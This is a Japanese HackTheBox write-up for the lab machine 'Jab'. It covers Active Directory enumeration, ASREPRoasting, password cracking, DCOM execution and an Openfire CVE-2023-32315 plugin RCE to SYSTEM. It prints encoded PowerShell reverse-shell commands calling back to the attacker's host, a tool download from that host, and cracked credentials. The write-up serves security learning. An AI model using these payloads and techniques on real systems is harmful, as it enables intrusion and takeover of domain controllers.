1
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

今回はHackTheBoxのMediumマシン「Jab」のWriteUpです!
名前からはどのようなマシンなのかわかりませんね。楽しみです。

image.png

グラフはいつものMediumという感じです。
評価は高めで、かなりいいマシンな予感がします。攻略目指して頑張ります!

HackTheBoxって何?という方は下記の記事を見てみてください!一緒にハッキングしましょう〜!

また、HackTheBoxで学習する上で役にたつサイトやツールをまとめている記事もあるので、合わせてみてみてください!

Jab

列挙

それでは攻略を開始しましょう。
まずはnmapを実行していきます。

+[~/jab]
(σ▰>∇<)σ<10.10.14.8>$ sudo nmap -Pn -v -n -sV -p- --min-rate=1000 10.10.11.4 
...
PORT      STATE SERVICE             VERSION
53/tcp    open  domain              Simple DNS Plus
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-07-15 16:01:58Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp   open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
5222/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
5223/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
5262/tcp  open  jabber
5263/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
5269/tcp  open  xmpp                Wildfire XMPP Client
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client
5275/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
5276/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7070/tcp  open  realserver?
7443/tcp  open  ssl/oracleas-https?
7777/tcp  open  socks5              (No authentication; connection not allowed by ruleset)
9389/tcp  open  mc-nmf              .NET Message Framing
47001/tcp open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc               Microsoft Windows RPC
49665/tcp open  msrpc               Microsoft Windows RPC
49666/tcp open  msrpc               Microsoft Windows RPC
49667/tcp open  msrpc               Microsoft Windows RPC
49673/tcp open  msrpc               Microsoft Windows RPC
49690/tcp open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
49691/tcp open  msrpc               Microsoft Windows RPC
49692/tcp open  msrpc               Microsoft Windows RPC
49697/tcp open  msrpc               Microsoft Windows RPC
49770/tcp open  msrpc               Microsoft Windows RPC

Windowsらしくかなりのポートが開いていますね。
LDAPの情報から、今回はADのドメインコントローラがターゲットのようです。
とりあえずSMBからチェックしましょう。

+[~/jab]
(σ▰>∇<)σ<10.10.14.8>$ crackmapexec smb 10.10.11.4 -u '' -p '' --shares
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4      445    DC01             [+] jab.htb\: 
SMB         10.10.11.4      445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED

共有にはアクセスできないようです。
DNSやLDAPで列挙を行ってみましたが、気になる情報は見つかりませんでした。

XMPP

他に列挙する対象がないかを見たとき、XMPP関連のポートが気になりました。

5269/tcp  open  xmpp                Wildfire XMPP Client
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client

HackTheBoxではかなり珍しいポートなので、なおさら気になります。

XMPPは、メッセージとプレゼンス情報をリアルタイムに交換するために、XML要素をストリーミングするためのプロトコルです。オープンな制定プロセスであることやプロトコル自身を拡張可能であることが特長

pidginを使用して接続可能なので、試してみましょう。pidginapt installでインストール可能です。

+[~/jab]
(σ▰>∇<)σ<10.10.14.8>$ pidgin

実行すると、pidginのポップアップが表示されます。

image.png

上記はアカウントが登録できる画面なので、「+ Add」を押下し、登録していきましょう。

image.png

プロトコルやユーザ名を入力できる画面が表示されます。プロトコルには「MXPP」を指定してください。そのほかは適当に入力し、「+ Add」を押下します。

image.png

押下すると、証明書を許可するかどうか聞かれるので、「Accept」を押下します。

image.png

再度、登録画面が表示されるので情報を入力し「OK」を押下します。

image.png

登録に成功したというメッセージが表示されました。

image.png

アカウントリストから先ほど作成したアカウントを選択すると、Buddy List(左側)でAvailableと表示されていることがわかります。

登録できたことにより、XMPPを使用して列挙ができるようになったので、探索しているとユーザを検索できそうな機能を発見しました。

image.png

ユーザを取得できると、ASREPRoastingやKerberoastingを試みることができます。「Search for Users」を押下してみましょう。

image.png

ユーザディレクトリを入力する画面が表示されますが、最初からsearch.jab.htbと入力されているため、特に変更せずそのまま進みます。

image.png

検索でどのような値を出力させるのか選択できる画面が表示されます。アスタリスク(*)を入力して「OK」を押下しましょう。

image.png

大量のユーザが出力されました。ユーザを確認できましたが、コピーできる形で出力されない限りASREPRoastingやKerberoastingでは使いにくいので、そのような機能がないか調べました。すると、以下のサイトを見つけました。

サイトによると、XMPPコンソールを使用すると、検索クエリの結果をXML形式で出力させることができるようです。コンソールを使用するには、プラグインからXMPPコンソールを有効にする必要があります。

image.png

有効へ変更後、XMPPコンソールを起動しましょう。

image.png

起動できました。
では、先ほどのサイトを参考にしてユーザをXML形式で出力させましょう。実行するクエリは以下の通りです。

<iq type='set' 
    from='perplex@jab.htb'
    to='search.jab.htb'
    id='users'
    xml:lang='en'>
	<query xmlns='jabber:iq:search'>
        <last>*</last>
	</query>
</iq>

上記のクエリを入力し、実行すると...

image.png

XML形式でユーザが出力されました!これをすべてコピーし、ユーザリストとして使用できる形に整形しましょう。

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ cat users.xml | grep jid | grep -oP "(?<=jid=')[^']+" > users.txt

ASREPRoasting

では、ユーザリストが作成できたので、ASREPRoastingを実行しましょう。

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ impacket-GetNPUsers jab.htb/ -dc-ip dc01.jab.htb -usersfile users.txt -outputfile asrep.txt -format hashcat

実行が終了すると、3人のユーザのハッシュがテキストに出力されていることがわかります。

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ cat asrep.txt                                                    
$krb5asrep$23$jmontgomery@jab.htb@JAB.HTB:7c839787f3faf76bb94a9494389374e1$3debd5299a5ec90c033d8bcc4fdbe665c1e5a8c9af963acadc1da3fe86ad49c1f8b00d86b0a144fb04942f032b779e6a2211f449ebfd4e82aab155e3c15e56a40caac07fb7309a9353c40c49d710ea758629546e90af051ba9b5032a6b1836193651a04b2f792400c40ccd936089860ad9246e3c2d85a52af4cf39ce1e53434f9be663e1cff119b7a682303e0629b5fec7703b4eac1680e594d63fd108faf75b546620994b40836dc3f508d240b8b7edd331f38539bfb32dc7a945fea9f02bd6398c6064c4b482f8bb686c7422fe2ae520dd88465c99babe59b32b698b064ea08374
$krb5asrep$23$lbradford@jab.htb@JAB.HTB:a312bb3aee2b69770ec2ede5e3aa1aa9$e2645d3fd9cabf9f10656cffca5df118718c2862dfb8a3b053d962b7d19305edd0dbe94433579b2486898fbc664177ef40f6d3b28e9c5fb8f2e6ebf059f81e9ee5aa3b79482cd1c557008a980474b4f2400deab6cacc2a78fc33373a9a23422a6d43a0fe2e3d4f1b273f9b54f59d142e7faa744e06a2fa8692b0b6b6bed2ae41199aff5711c2f72223261151191c25f13237d7c702668b1c5990d1a3eb2c5ad3d59832fda7d5186736850d3a92d93aec018a43f56a174b04fbb883d2e245b0ee9b25751c4daf177cd243247e016f0d85ce8bcafa1bd6dcb2532321e859e6b8bb3b5c
$krb5asrep$23$mlowe@jab.htb@JAB.HTB:566471f12e740ea622633c3ea7b3e6bc$61d8b842f9f333e0a8477ad759c2027329fb15d6969b6e6e1f4c6e9d510fda724368e930b32b13832aeed3f0bb44595cf846e7c34eb1522e74d8032dbb98ee9a3f2f80162ba27bbdde377674896d47fe5133f532da8c6f7c5a6fbee883a40c96e5c55ba19577de986358a9844625b883380662e8adadf2ef9178dd63ed95d39bcbddc184b22cba060b5e62716a6e8e987fbcdb8d7011d1626b39910a8495a3a6932ccc9291c5e5861b128ebd89f6c437ab64d322684dd74ef16171093def01378d2b509bb7e4808e08e687c8f62508f0463d3f0f29562c994795cef7355e0724a134

hashcatを実行し、ハッシュが解読できるか試してみましょう。

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ hashcat asrep.txt /usr/share/wordlists/rockyou.txt 

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$jmontgomery@jab.htb@JAB.HTB:7c839787f3faf76bb94a9494389374e1$3debd5299a5ec90c033d8bcc4fdbe665c1e5a8c9af963acadc1da3fe86ad49c1f8b00d86b0a144fb04942f032b779e6a2211f449ebfd4e82aab155e3c15e56a40caac07fb7309a9353c40c49d710ea758629546e90af051ba9b5032a6b1836193651a04b2f792400c40ccd936089860ad9246e3c2d85a52af4cf39ce1e53434f9be663e1cff119b7a682303e0629b5fec7703b4eac1680e594d63fd108faf75b546620994b40836dc3f508d240b8b7edd331f38539bfb32dc7a945fea9f02bd6398c6064c4b482f8bb686c7422fe2ae520dd88465c99babe59b32b698b064ea08374:Midnight_121
Approaching final keyspace - workload adjusted.           

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: asrep.txt

jmontgomeryのハッシュを解読することができました。
パスワードを取得できたので、認証情報を使用し様々なサービスを列挙します。まずはSMBを確認します。

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ crackmapexec smb jab.htb -u jmontgomery -p 'Midnight_121'
SMB         jab.htb         445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         jab.htb         445    DC01             [+] jab.htb\jmontgomery:Midnight_121 

認証に成功しています。共有を見てみましょう。

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ crackmapexec smb jab.htb -u jmontgomery -p 'Midnight_121' --shares
SMB         jab.htb         445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         jab.htb         445    DC01             [+] jab.htb\jmontgomery:Midnight_121 
SMB         jab.htb         445    DC01             [+] Enumerated shares
SMB         jab.htb         445    DC01             Share           Permissions     Remark
SMB         jab.htb         445    DC01             -----           -----------     ------
SMB         jab.htb         445    DC01             ADMIN$                          Remote Admin
SMB         jab.htb         445    DC01             C$                              Default share
SMB         jab.htb         445    DC01             IPC$            READ            Remote IPC
SMB         jab.htb         445    DC01             NETLOGON        READ            Logon server share 
SMB         jab.htb         445    DC01             SYSVOL          READ            Logon server share 

特にめぼしいものはありません。次にWinRMを確認してみましょう。

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ crackmapexec winrm jab.htb -u jmontgomery -p 'Midnight_121'    
SMB         jab.htb         5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
HTTP        jab.htb         5985   DC01             [*] http://jab.htb:5985/wsman
WINRM       jab.htb         5985   DC01             [-] jab.htb\jmontgomery:Midnight_121

WinRMは使用できないようです。
他に認証を試すことができるか少し悩みましたが、列挙が終わったと思っていたXMPPでも認証があることを思い出しました。

image.png

ユーザを登録したときと同じようにjmontgomeryユーザの認証情報を入力し、「+ Add」を押下しましょう。

image.png

ユーザが追加されました。
追加後、新たな情報が得られないか機能を見ていると、ルームを検索する機能があることに気が付きました。

image.png

一見、ルームが存在していないようにも見えますが、「Get List」を押下してみます。

image.png

いくつかのルームが表示されました!testtest2には特に有用な情報は残っていなかったのでpentest2003を見てみます。

image.png

過去に実施されたペネトレーションテストのレポートが表示されました。また、その中にsvc_openfireのハッシュとその解析結果が含まれています。解読の結果パスワードが平文で見えているので、この認証情報が機能するか試してみましょう。

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ crackmapexec smb jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw'
SMB         jab.htb         445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         jab.htb         445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw

SMBで機能しました!WinRMはどうでしょうか。

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ crackmapexec winrm jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw'
SMB         jab.htb         5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
HTTP        jab.htb         5985   DC01             [*] http://jab.htb:5985/wsman
WINRM       jab.htb         5985   DC01             [-] jab.htb\svc_openfire:!@#$%^&*(1qazxsw

やはりWinRMはダメみたいですね。

ExecuteDCOM

他に認証情報を持っていてできることとしてbloodhoundを実行するという手があります。svc_openfireは名前からしてサービスアカウントであり、高い権限を持っている可能性があるので実行する価値は十分あると思います。

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ /home/kali/.local/bin/bloodhound-python -d jab.htb -c all -u svc_openfire -p '!@#$%^&*(1qazxsw' -ns 10.10.11.4 --zip -dc 10.10.11.4

実行できたら、zipファイルをbloodhoundに食わせて悪用できそうな権限がないか確認しましょう。
確認したところsvc_openfiredc01.jab.htbに対してExecuteDCOM権限があることがわかりました。

svc_openfire としてのシェル

ExecuteDCOM権限があればシェルを取得できるので、シェルを取得していきましょう。
まずは待ち受けを作成します。

+[/opt]
(σ▰>∇<)σ<10.10.14.11>$ rlwrap nc -lnvp 2121                
listening on [any] 2121 ...

これで準備万端です。impacket-dcomexecを実行しましょう。

+[/opt]
(σ▰>∇<)σ<10.10.14.11>$ impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAxACIALAAyADEAMgAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -silentcommand
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

うまくいってそうです。待ち受けを確認しましょう。

+[/opt]
(σ▰>∇<)σ<10.10.14.11>$ rlwrap nc -lnvp 2121                
listening on [any] 2121 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.4] 52232
PS C:\windows\system32> whoami
jab\svc_openfire

やっと初期侵入に成功しました!

PS C:\Users\svc_openfire\Desktop> dir

    Directory: C:\Users\svc_openfire\Desktop

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---         9/3/2024   6:55 AM             34 user.txt     

ユーザフラグも取得できました。

垂直権限昇格

それではここから権限昇格を目指していきます。
権限は確認していて権限昇格に繋がりそうなものはなかったので、サービスを調べます。

PS C:\Program Files> dir

    Directory: C:\Program Files

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       10/23/2023  12:12 PM                Common Files                                                          
d-----         1/8/2024  10:58 AM                internet explorer                                                     
d-----       10/23/2023   1:00 PM                Java                                                                  
d-----         2/1/2024   7:55 AM                Mozilla Firefox                                                       
d-----         2/1/2024   8:32 AM                Openfire                                                              
d-----       10/23/2023  12:12 PM                VMware                                                                
d-----         1/8/2024  10:58 AM                Windows Defender                                                      
d-----         1/8/2024  10:58 AM                Windows Defender Advanced Threat Protection                           
d-----         1/8/2024  10:58 AM                Windows Mail                                                          
d-----         1/8/2024  10:58 AM                Windows Media Player                                                  
d-----        9/15/2018   3:19 AM                Windows Multimedia Platform                                           
d-----        9/15/2018   3:28 AM                windows nt                                                            
d-----         1/8/2024  10:58 AM                Windows Photo Viewer                                                  
d-----        9/15/2018   3:19 AM                Windows Portable Devices                                              
d-----        9/15/2018   3:19 AM                Windows Security                                                      
d-----        9/15/2018   3:19 AM                WindowsPowerShell               

多くはWindowsでよく見るサービスですが、その中に一つOpenfireだけ異色なものとして存在していますね。アカウント名からして権限昇格のターゲットはOpenfireのような気がします。フォルダを掘っていくとopenfire.xmlというファイルがあるので確認します。

PS C:\Program Files\Openfire\conf> type openfire.xml
<?xml version="1.0" encoding="UTF-8"?>
...
<!-- root element, all properties must be under this element -->
<jive> 
  <adminConsole> 
    <!-- Disable either port by setting the value to -1 -->  
    <port>9090</port>  
    <securePort>9091</securePort>  
    <interface>127.0.0.1</interface> 
  </adminConsole>  
  <locale>en</locale>  
...

サーバが使用しているポートが記入されています。ローカルで動いているようなのでchiselを使用する必要がありますね。wgetを使用して転送しましょう。

PS C:\Users\svc_openfire\Downloads> wget 10.10.14.11:8021/chisel.exe -outfile chisel.exe

転送できたら実行しましょう。

-- kali
+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ /opt/too1s-l1nux/chisel server -p 9999 --reverse

-- target
PS C:\Users\svc_openfire\Downloads> ./chisel.exe client 10.10.14.11:9999 R:9090:localhost:9090

これでKali側からもアクセスが可能になりました。
ブラウザで9090番にアクセスしましょう。

image.png

ログイン画面が表示されました。svc_openfireの認証情報を使用してログインしましょう。

image.png

ログインに成功しました!

CVE-2023-32315

ログイン後のダッシュボードにはOpenfireのバージョンが表示されており、「4.7.5」であることがわかります。脆弱性がないか確認したところ以下のサイトを発見しました。

どうやら認証バイパスからプラグインを使用したRCEの脆弱性が存在するようです。今回はすでにログインしているので認証バイパスは必要ないですが、プラグインを使用したRCEは権限昇格につながるかもしれないので、試す価値は十分あります。READMEに実行手順も載っているので、参考にして実行しましょう。まずはcloneします。

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ git clone https://github.com/miko550/CVE-2023-32315.git

プラグインがダウンロードできたので、アップロードします。

image.png

アップロードに成功しました。サーバ設定から管理ツールへアクセスします。

image.png

このページで「123」を入力し、ログインしましょう。

image.png

最初は「Program home page」が表示されています。ドロップダウンから「system command」を選択すると...

image.png

コマンドを実行することのできる画面が表示されました。
試しにwhoamiを実行してみましょう。

image.png

system権限で実行されています!

system としてのシェル

それではシェルを取得しましょう。まずは待ち受けを用意します。

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ rlwrap nc -lnvp 2122                
listening on [any] 2122 ...

これで準備は完了です。コマンドを実行しましょう。使用するコマンドは以下です。

c:\Windows\System32\cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAxACIALAAyADEAMgAyACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

コマンドを入力し、「Execute」を押下しましょう。待ち受けを確認すると...

+[~/jab]
(σ▰>∇<)σ<10.10.14.11>$ rlwrap nc -lnvp 2122                
listening on [any] 2122 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.4] 53094
PS C:\Program Files\Openfire\bin> whoami
nt authority\system

権限昇格達成です!

PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---         9/3/2024   6:55 AM             34 root.txt  

ルートフラグも取得でき、完全攻略達成です!

1
1
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
1
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?